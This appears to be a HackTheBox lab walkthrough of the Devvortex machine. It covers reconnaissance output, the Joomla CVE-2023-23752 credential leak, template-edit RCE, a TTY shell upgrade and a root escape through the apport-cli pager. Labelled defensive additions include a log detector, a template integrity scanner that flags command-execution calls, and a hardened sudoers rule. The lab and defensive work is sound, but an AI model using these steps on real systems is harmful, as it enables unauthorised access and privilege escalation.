HackTheBox Writeup — Devvortex

BXDMAN
7 min read · Nov 29, 2023


Port Scanning

sudo nmap -Pn -T 5 -p- -vv -sS --min-rate 5000 -oN result [IP]
# Nmap 7.94 scan initiated Mon Nov 27 11:36:20 2023 as: nmap -Pn -T 5 -p- -vv -sS --min-rate 5000 -oN result 10.10.11.242
Warning: 10.10.11.242 giving up on port because retransmission cap hit (2).
Increasing send delay for 10.10.11.242 from 0 to 5 due to 2015 out of 5037 dropped probes since last increase.
Nmap scan report for 10.10.11.242
Host is up, received user-set (0.28s latency).
Scanned at 2023-11-27 11:36:20 +07 for 21s
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63

Web Service

After exploring, I discovered that this website is a static site, so I will look for other directory paths and vhosts. I detected the vhost using gobuster and the directory paths using dirsearch.

In fact, you can use gobuster to find directory paths too, but I prefer dirsearch. XD!!!!

Result of Dirsearch


_|. _ _ _ _ _ _|_ v0.4.3.post1
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /Users/imbatman/Workspaces/hackthebox/devvortex/reports/http_devvortex.htb/_23-11-29_08-56-58.txt

Target: http://devvortex.htb/

[08:56:58] Starting:
[08:57:05] 301 - 178B - /js -> http://devvortex.htb/js/
[08:57:26] 200 - 7KB - /about.html
[08:58:21] 200 - 9KB - /contact.html
[08:58:23] 301 - 178B - /css -> http://devvortex.htb/css/
[08:58:40] 403 - 564B - /images/
[08:58:40] 301 - 178B - /images -> http://devvortex.htb/images/
[08:58:45] 403 - 564B - /js/

Task Completed

Result of Gobuster

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://devvortex.htb
[+] Method: GET
[+] Threads: 100
[+] Wordlist: ./SecLists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
[+] Append Domain: true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: dev.devvortex.htb Status: 200 [Size: 23221]
Progress: 4989 / 4990 (99.98%)
===============================================================
Finished
===============================================================

The dirsearch result confirms that this service is just a static website, and Yummy, I found another vhost. Let's try to play with it. XD!!!!

The other vhost is dev.devvortex.htb.

User Flag

Using the Chrome extension Wappalyzer, I was able to determine which framework the service is built on. The service runs on Joomla, and I will use joomscan to check the CMS version, theme, and plugins.


____ _____ _____ __ __ ___ ___ __ _ _
(_ _)( _ )( _ )( \/ )/ __) / __) /__\ ( \( )
.-_)( )(_)( )(_)( ) ( \__ \( (__ /(__)\ ) (
\____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
(1337.today)

--=[OWASP JoomScan
+---++---==[Version : 0.0.7
+---++---==[Update Date : [2018/09/23]
+---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
--=[Code name : Self Challenge
@OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP

Processing http://dev.devvortex.htb ...



[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] Joomla 4.2.6

[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable

[+] Checking apache info/status files
[++] Readable info/status files are not found

[+] admin finder
[++] Admin page : http://dev.devvortex.htb/administrator/

[+] Checking robots.txt existing
[++] robots.txt is found
path : http://dev.devvortex.htb/robots.txt

Interesting path found from robots.txt
http://dev.devvortex.htb/joomla/administrator/
http://dev.devvortex.htb/administrator/
http://dev.devvortex.htb/api/
http://dev.devvortex.htb/bin/
http://dev.devvortex.htb/cache/
http://dev.devvortex.htb/cli/
http://dev.devvortex.htb/components/
http://dev.devvortex.htb/includes/
http://dev.devvortex.htb/installation/
http://dev.devvortex.htb/language/
http://dev.devvortex.htb/layouts/
http://dev.devvortex.htb/libraries/
http://dev.devvortex.htb/logs/
http://dev.devvortex.htb/modules/
http://dev.devvortex.htb/plugins/
http://dev.devvortex.htb/tmp/


[+] Finding common backup files name
[++] Backup files are not found

[+] Finding common log files name
[++] error log is not found

[+] Checking sensitive config.php.x file
[++] Readable config files are not found


Your Report : reports/dev.devvortex.htb/

The joomscan results showed the paths discovered in robots.txt, and no other vulnerabilities were found, but the Joomla version it discovered is of great interest. After researching Joomla 4.2.6, I found a few vulnerabilities. The one I will use is CVE-2023-23752.

Users
[649] lewis (lewis) - lewis@devvortex.htb - Super Users
[650] logan paul (logan) - logan@devvortex.htb - Registered

Site info
Site name: Development
Editor: tinymce
Captcha: 0
Access: 1
Debug status: false

Database info
DB type: mysqli
DB host: localhost
DB user: lewis
DB password: xxxxxxxxxx
DB name: joomla
DB prefix: sd4fg_
DB encryption 0
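From the defender's side, the leak shown above is what CVE-2023-23752 hands to anyone who can reach the site. The following Python is an added example, not from the writeup or from Joomla, that checks whether a version string falls in the affected range and picks requests to the affected API endpoints out of web-server access logs. The endpoint paths and the version range (4.0.0 through 4.2.7, fixed in 4.2.8) are taken from the public advisory, and the log lines are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Joomla web-services endpoints whose access check was missing in CVE-2023-23752
# (Joomla 4.0.0 through 4.2.7; fixed in 4.2.8). The paths come from the public
# advisory, not from this writeup; the regex also accepts the rewritten form
# without "index.php".
SENSITIVE_API_RE = re.compile(
    r"^/api/(?:index\.php/)?v1/(?:config/application|users)(?:/|$)"
)

# Apache/nginx "combined" access-log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


def is_vulnerable_version(version: str) -> bool:
    """True for Joomla 4.0.0 <= version <= 4.2.7 (the CVE-2023-23752 range)."""
    parts = tuple(int(p) for p in version.split("."))
    return (4, 0, 0) <= parts < (4, 2, 8)


def is_config_disclosure_attempt(target: str) -> bool:
    """A request to a sensitive API path carrying public=true, which is how the
    missing access check was reached."""
    parts = urlsplit(target)
    if not SENSITIVE_API_RE.match(parts.path):
        return False
    public = parse_qs(parts.query).get("public", [""])[0]
    return public.lower() == "true"


def find_disclosure_attempts(lines):
    """Return one record per access-log line that targets the affected endpoints."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        if is_config_disclosure_attempt(m["target"]):
            status = int(m["status"])
            hits.append({
                "ip": m["ip"],
                "ts": m["ts"],
                "target": m["target"],
                "status": status,
                # A 200 means the server answered: the config or user list left the box.
                "leaked": status == 200,
            })
    return hits


# Constructed sample log lines (not from the writeup or the machine).
SAMPLE_LOG = [
    '10.10.16.9 - - [27/Nov/2023:11:40:01 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 1024 "-" "curl/8.4.0"',
    '10.10.16.9 - - [27/Nov/2023:11:40:02 +0000] "GET /api/index.php/v1/users?public=true HTTP/1.1" 200 512 "-" "curl/8.4.0"',
    '10.10.16.9 - - [27/Nov/2023:11:40:03 +0000] "GET /about.html HTTP/1.1" 200 7213 "-" "Mozilla/5.0"',
    '10.10.16.9 - - [27/Nov/2023:11:40:04 +0000] "GET /api/index.php/v1/content/articles?public=true HTTP/1.1" 200 4096 "-" "curl/8.4.0"',
    '10.10.16.9 - - [27/Nov/2023:11:40:05 +0000] "GET /api/v1/config/application?public=true HTTP/1.1" 403 564 "-" "curl/8.4.0"',
]

if __name__ == "__main__":
    print("4.2.6 affected:", is_vulnerable_version("4.2.6"))
    for hit in find_disclosure_attempts(SAMPLE_LOG):
        print(hit)
```

Public content endpoints such as articles are meant to answer with public=true, so the filter only names the two endpoints the advisory covers; a hit with status 200 is the one worth treating as a confirmed disclosure.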

I've obtained leaked data that includes users and passwords, so I'll try to log in to SSH with those credentials, but that does not work, so let's try to log in on the admin page instead. I had overlooked the path that the scan result had shown me.

This page is pretty. XD!!

I looked into every function of the service and, in the end, identified something we can use for RCE. Just go to System > Administrator Templates > Atum Details and Files. There you can view and edit the template files. I use the system command to show that this vulnerability can be used for a reverse shell by pinging back to my laptop. After saving, you must go to /administrator/templates/atum/login.php to make the command execute, and don't forget to run the tcpdump command on your laptop.

tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on utun6, link-type NULL (BSD loopback), snapshot length 524288 bytes
10:05:11.750466 IP devvortex.htb > 10.10.16.9: ICMP echo request, id 2, seq 1, length 64
10:05:11.750530 IP 10.10.16.9 > devvortex.htb: ICMP echo reply, id 2, seq 1, length 64
10:05:12.458825 IP devvortex.htb > 10.10.16.9: ICMP echo request, id 2, seq 2, length 64
10:05:12.458887 IP 10.10.16.9 > devvortex.htb: ICMP echo reply, id 2, seq 2, length 64
10:05:13.458471 IP devvortex.htb > 10.10.16.9: ICMP echo request, id 2, seq 3, length 64
10:05:13.458532 IP 10.10.16.9 > devvortex.htb: ICMP echo reply, id 2, seq 3, length 64
10:07:52.782843 IP devvortex.htb > 10.10.16.9: ICMP echo request, id 3, seq 1, length 64
10:07:52.782886 IP 10.10.16.9 > devvortex.htb: ICMP echo reply, id 3, seq 1, length 64
10:07:53.779977 IP devvortex.htb > 10.10.16.9: ICMP echo request, id 3, seq 2, length 64
10:07:53.780044 IP 10.10.16.9 > devvortex.htb: ICMP echo reply, id 3, seq 2, length 64
10:07:54.799631 IP devvortex.htb > 10.10.16.9: ICMP echo request, id 3, seq 3, length 64
10:07:54.799672 IP 10.10.16.9 > devvortex.htb: ICMP echo reply, id 3, seq 3, length 64
10:09:45.292800 IP devvortex.htb > 10.10.16.9: ICMP echo request, id 4, seq 1, length 64
10:09:45.292858 IP 10.10.16.9 > devvortex.htb: ICMP echo reply, id 4, seq 1, length 64
10:09:46.209648 IP devvortex.htb > 10.10.16.9: ICMP echo request, id 4, seq 2, length 64
10:09:46.209692 IP 10.10.16.9 > devvortex.htb: ICMP echo reply, id 4, seq 2, length 64
10:09:47.210885 IP devvortex.htb > 10.10.16.9: ICMP echo request, id 4, seq 3, length 64
10:09:47.210951 IP 10.10.16.9 > devvortex.htb: ICMP echo reply, id 4, seq 3, length 64

Pretty good, the machine can ping back to my laptop, so the next step is the reverse shell.
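Because the template editor is a legitimate admin feature, a change like the one above shows up only if the files themselves are watched. This Python is an added example, not part of the writeup or of Joomla, that baselines the SHA-256 of every PHP file under a template directory and then flags files that are new, modified, or contain command-execution calls; the directory tree and the tampered login.php are constructed in a temporary folder.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# PHP calls that have no business in a Joomla template file.
DANGEROUS_CALL_RE = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval)\s*\(", re.IGNORECASE
)


def sha256_file(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def build_baseline(root: Path) -> dict:
    """Map each PHP file (relative to root) to its SHA-256, taken from a known-good install."""
    return {p.relative_to(root).as_posix(): sha256_file(p) for p in root.rglob("*.php")}


def scan_templates(root: Path, baseline: dict) -> list:
    """Return one finding per PHP file that is new, modified, or calls a command-execution function."""
    findings = []
    for php in sorted(root.rglob("*.php")):
        rel = php.relative_to(root).as_posix()
        reasons = []
        digest = sha256_file(php)
        if rel not in baseline:
            reasons.append("new file not in baseline")
        elif baseline[rel] != digest:
            reasons.append("hash differs from baseline")
        src = php.read_text(errors="replace")
        for m in DANGEROUS_CALL_RE.finditer(src):
            line_no = src.count("\n", 0, m.start()) + 1
            reasons.append(f"calls {m.group(1)}() at line {line_no}")
        if reasons:
            findings.append({"file": rel, "reasons": reasons})
    return findings


def demo() -> list:
    """Constructed sample: a clean template tree, then the kind of edit the writeup describes."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "administrator" / "templates" / "atum"
        root.mkdir(parents=True)
        (root / "index.php").write_text("<?php\ndefined('_JEXEC') or die;\necho 'index';\n")
        (root / "login.php").write_text("<?php\ndefined('_JEXEC') or die;\necho 'login';\n")
        baseline = build_baseline(root)  # snapshot of the known-good state

        # Simulated tampering through the template editor: a command call appended
        # to login.php and an extra file dropped next to it.
        with (root / "login.php").open("a") as f:
            f.write("system('id');\n")
        (root / "cache.php").write_text("<?php\necho 'unexpected';\n")

        return scan_templates(root, baseline)


if __name__ == "__main__":
    for finding in demo():
        print(finding["file"], "->", "; ".join(finding["reasons"]))
```

On a real install the baseline would be built right after deployment and stored off the web root; the hash check catches any edit, and the call pattern gives a reason even when no baseline exists yet.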

Next, I will upgrade the simple shell to a fully interactive TTY.

# On the victim
python3 -c 'import pty; pty.spawn("/bin/bash")'
# then press Ctrl-Z to background the shell

# In your own terminal, run these and note the TERM value, rows and columns
echo $TERM
stty -a

# Switch your terminal to raw mode and bring the backgrounded shell back to the foreground
stty raw -echo; fg

# On the victim, using the values noted above
export TERM=[term]
stty rows [rows] columns [columns]

It's up to you whether to do the previous step or not. To avoid making the same mistake again in this section, I went back and looked at the joomscan scanning information. We have the MySQL credentials. Try to log in to MySQL. After logging in you should prove your MySQL CLI skills. XD!!

mysql -u lewis -p joomla --password=xxx

If you can dump the credentials, the next step is to crack the hash and log in to SSH.

> john hash --show
logan@devvortex.htb:xxx
user flag

Privilege Escalation

For privilege escalation, I first just try the basic way, since we know the user's password:

sudo -l
User logan may run the following commands on devvortex:
(ALL : ALL) /usr/bin/apport-cli

You can run apport-cli with sudo, so let's try this command.

sudo /usr/bin/apport-cli -h

We can check the version of apport-cli with the -v flag.

After some research I found an issue for apport on their GitHub, and there I discovered a proof of concept for LPE. If you don't have a crash file in /var/crash, you can generate one with linpeas. The file name is unimportant; all crash files are usable. Just load it, type V to open the viewer prompt, and then !/bin/bash.

sudo /usr/bin/apport-cli -c /var/crash/_usr_bin_sleep.1000.crash
root flag
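For the sudo rule, the weakness is not apport-cli itself but the shell that its pager can spawn under root. Below is an added sudoers comparison, not from the writeup, with the rule as the box had it next to a hardened version using sudo's NOEXEC tag; the user name and path are the ones from the sudo -l output above.

```sudoers
# Weak rule, as shown by `sudo -l` on the box: apport-cli runs as root and the
# pager it opens inherits that, so a shell escape from the pager is a root shell.
logan ALL=(ALL : ALL) /usr/bin/apport-cli

# Hardened rule (assumed alternative, not from the writeup): NOEXEC stops
# apport-cli, and anything it launches such as the pager, from executing
# further programs, so the "!" escape has nothing to run.
logan ALL=(ALL : ALL) NOEXEC: /usr/bin/apport-cli
```

Check the file with visudo -c before relying on it. NOEXEC works by preloading a library into dynamically linked programs, as sudoers(5) describes, so it does not cover statically linked binaries; patching apport closes the pager issue itself, and the rule is the stop-gap until then.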

Thank you for reading. This is my first time writing a writeup in English.

>>>>>>>>>>>>>>> “Learning By Doing ,Trial And Error” <<<<<<<<<<<<<<<<
